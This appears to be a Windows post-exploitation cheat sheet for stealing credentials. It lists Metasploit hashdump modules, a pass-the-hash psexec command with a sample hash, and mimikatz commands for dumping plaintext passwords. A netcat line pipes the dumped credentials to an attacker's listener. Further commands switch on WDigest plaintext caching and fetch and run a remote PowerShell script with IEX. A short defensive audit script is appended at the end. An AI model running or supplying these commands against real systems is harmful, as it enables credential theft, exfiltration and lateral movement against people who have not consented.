Obtaining the password hashes
msf
run post/windows/gather/smart_hashdump
run post/windows/gather/hashdump
What can be done with the hash data?
PTH (pass-the-hash): requires the username and the hashed password in LM:NT form, and port 445 open
exploit/windows/smb/psexec
python2 psexec.py 192.168.2.96/hk@192.168.2.96 -hashes aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942
If the plaintext password is needed, the hash has to be cracked, e.g. a dictionary attack with SAMInside.
Obtaining the plaintext password directly
MSF
load mimikatz  # "help mimikatz" shows the help
wdigest  # dump WDigest passwords
mimikatz_command -f samdump::hashes  # run a raw mimikatz command
mimikatz_command -f sekurlsa::searchPasswords
GetPassword_x64.exe
mimikatz
privilege::debug sekurlsa::logonpasswords
wce -l -v  # dump hashes
Attacker machine, listening: nc -lvvp 9999
Compromised host: mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" exit | nc.exe -vv 192.168.2.101 9999  # sends the captured output back to the attacker machine
Dumping passwords on patched hosts
Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, add "UseLogonCredential" (DWORD)
The idea of the attack is to set UseLogonCredential to 1, which forces the "plaintext" password to be kept in the LSASS process.
The test steps are: modify the registry, lock the screen (or reboot, not recommended), wait for an administrator to log in
Modify the registry:
cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
powershell: Set-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -Name UseLogonCredential -Type DWORD -Value 1
meterpreter: reg setval -k HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -v UseLogonCredential -t REG_DWORD -d 1
Lock the screen:
cmd: rundll32 user32.dll,LockWorkStation
powershell: powershell -c "IEX (New-Object Net.WebClient).DownloadString('https://x.x.x.x/Lock-WorkStation.ps1');"
The code of Lock-WorkStation.ps1 is as follows:
Function Lock-WorkStation
{
    # P/Invoke declaration for the user32.dll LockWorkStation API
    $signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
    # Compile the declaration into a .NET type and call it
    $LockWorkStation = Add-Type -MemberDefinition $signature -Name "Win32LockWorkStation" -Namespace Win32Functions -PassThru
    $LockWorkStation::LockWorkStation() | Out-Null
}
Lock-WorkStation
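A defender's check for the registry setting the notes above rely on, added here as an example (it is not part of the original notes). It reads UseLogonCredential under the WDigest key, reports when the weak value 1 is set, and with -Remediate resets it to 0; it assumes KB2871997 or a newer OS is present, so that an absent value or 0 means WDigest does not cache plaintext credentials.

```powershell
# Added example, not from the original notes: audit (and optionally reset) the
# WDigest UseLogonCredential value that forces plaintext credentials into LSASS.
# Assumption: KB2871997 or Windows 8.1 / Server 2012 R2 or later, so an absent
# value or 0 means no plaintext caching.
param([switch]$Remediate)

$KeyPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$Name    = 'UseLogonCredential'

function Get-WDigestState {
    # Returns an object describing whether plaintext caching is enabled.
    if (-not (Test-Path $KeyPath)) {
        return [pscustomobject]@{ Present = $false; Value = $null; Exposed = $false }
    }
    $item = Get-ItemProperty -Path $KeyPath -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) {
        return [pscustomobject]@{ Present = $false; Value = $null; Exposed = $false }
    }
    $value = [int]$item.$Name
    # 1 is the weak setting; any other value leaves caching disabled
    [pscustomobject]@{ Present = $true; Value = $value; Exposed = ($value -eq 1) }
}

$state = Get-WDigestState
if ($state.Exposed) {
    Write-Warning "$Name = 1 under $KeyPath: plaintext credentials will be cached in LSASS at the next logon."
    if ($Remediate) {
        # 0 is the hardened value; explicitly setting it also covers hosts where the value was added by hand
        Set-ItemProperty -Path $KeyPath -Name $Name -Type DWord -Value 0
        Write-Output "Reset $Name to 0."
    }
} else {
    Write-Output ("WDigest plaintext caching disabled (value present: {0}, value: {1})." -f $state.Present, $state.Value)
}
```

Run it periodically or from an endpoint management job; an unexpected change of this value to 1 is itself worth treating as an alert.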